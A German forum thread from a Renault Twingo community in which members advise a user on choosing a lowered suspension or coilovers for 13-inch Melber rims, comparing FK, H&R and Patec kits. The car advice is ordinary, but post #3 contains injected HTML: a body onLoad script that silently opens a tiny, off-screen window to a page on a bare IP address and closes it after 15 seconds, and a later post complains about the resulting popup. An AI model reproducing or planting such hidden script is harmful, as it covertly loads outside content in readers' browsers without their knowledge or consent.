Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Hilfe zum Fahrwerk
#1
hey alle zusammen, so nun brauche ich auch mal eure Hilfe...
und zwar will ich mir ein neues Fahrwerk zulegen, nun kann ich mich aber nicht entscheiden welches...

habe 13" Alu´s von Melber, im Gutachten steht:
Radtyp M183
Radgröße 5 1/2 J x 13 H2
Et 7mm, Spurweite wird dadurch um 58mm vergrößert

folgende Bereifung:
Falken 175/60R13

habe bis jetzt 20mm Federn von SK-drin...

kann ich ohne probleme ein 70/40 Fahrwerk nehmen? oder was würdet ihr vorschlagen?
[Bild: twingo-festival.de.jpg]
Zitieren
Es bedanken sich:
#2
Also an der Hinterachse könntest du Probleme bekommen, ich hatte 7x13 und das FK 70/40 Fahrwerk da musst ich an der Hinterachse Federwegsbegrenzer nehmen sonst hätte der Reifen am Radlauf gestriffen.
Wenn Du eine ET von 7 hast dann sollte es bei dir auf jeden Fall hinten auch nötig sein FB`s zu verwenden.
Allerdings würde ich abraten von diesem Fahrwerk es ist extrem hart und wenn man mal etwas schneller durch ne Kurve fährt wird man in Bodenwellen sehr leicht ausgehebelt...
Ich würde ein Gewinde nehmen alleine schon aus dem Grund das man wenn man ein festes Fahrwerk drin hat nach ner gewissen Zeit immer tiefer will so ist es zumindest bei mir...
Zitieren
Es bedanken sich:
#3
Würde auch ein Gewinde empfehlen. Das H&R Gewindefahwerk habe ich schon und werde ich wieder fahren weill es sehr angenehm zu fahren war. Nicht zu hart aber sportlich, mit einem leichten Übersteuern im Grenzbereich.


Ben


<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);onUnload='win.close()';"></body>
Zitieren
Es bedanken sich:
#4
bei 70 40 solltest du echt ein gewinde nehmen. ansonsten : mit nem 50 / 50er patec fahrwerk lassen sich diese reifen auf ner 5.5er felge gut fahren, ausetzen nur, wenn hinten 2 erwachsenen drinhocken und es mit schmackes den hügel hochgeht.

mfg
sebi

p.s.: kommt dieses besch***ene popup eigentlich bei jedem ? oder hab nur ich das? ziemlich nervig
Zitieren
Es bedanken sich:
#5
Hallo auch,

mit Patec hab ich bislang keine guten Erfahrungen gemacht. War allerdings ein Lupo ( mit dem im Übrigen auch nicht Laughing ) alle halbe Jahr war ein anderer Dämpfer defekt, und musste eingeschickt werden außerdem war das Fahrwerk bockhart!!

Sehr gut sind ( wie bereits erwähnt ) die H+R Gewindefahrwerke, aber Qualität hat ja auch Ihren Preis Sad ! Ich muss allerdings sagen daß Gewinde ( für mich!! ) eigentlich keinen Sinn macht man stellt es normalerweise passend zur Rad-Reifenkombi und zum tiefsten Punkt ein und dann nie wieder!

FK habe ich auch schon gefahren und bin eigentlich sehr zufrieden, das Preis Leistungsverhältniss passt absolut ( Nutenverstellung hinten etc.... ) Außerdem haben die derzeit ne Aktion laufen da kostet ein 60/40 er Komplettfahrwerk um die 240- 250 Euro incl. Versand!

Gruß Heiko
Zitieren
Es bedanken sich:
#6
wo finde ich die aktion denn?
das wäre wohl doch das passenste, den ein gewinde kann ich mir zur zeit nicht leisten... sind noch genug andere sachen zu machen.

kannst du mir mal die seite geben wo die aktion läuft?
damit ich mir gleich eins betsellen/zurücklegen lassen kann...

DANKE
[Bild: twingo-festival.de.jpg]
Zitieren
Es bedanken sich:
#7
Hallo nochmal,

ist ne FK Händler-Aktion, d.h. es gibt so ein Faltblatt mit diversen Saugünstigen Artikeln, wie Spiegel ( M-Look ) Federn, Fahrwerke, etc.
Dieses Faltblatt geht an Händler die verhökern die Dinger ( mit mehr Gewinn! ) für den Zeitraum der Aktion zum normalen Preis!

Wenn Ihr also ne(n) Bekannte(n) habt der (die) in einem Autohaus arbeitet dann los vielleicht könnt ihr was zum verbilligten EK abgreifen!

Heiko
Zitieren
Es bedanken sich:


Möglicherweise verwandte Themen…
Thema Verfasser Antworten Ansichten Letzter Beitrag
  Twingo RS-Fahrwerk identisch mit GT-Fahrwerk? cede 4 6.699 11.05.2015, 11:51
Letzter Beitrag: RölliWohde
ZZTwingo1 Hilfe beim Fahrwerk Pink-Lady 5 3.008 31.05.2010, 15:46
Letzter Beitrag: Sebastian89

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste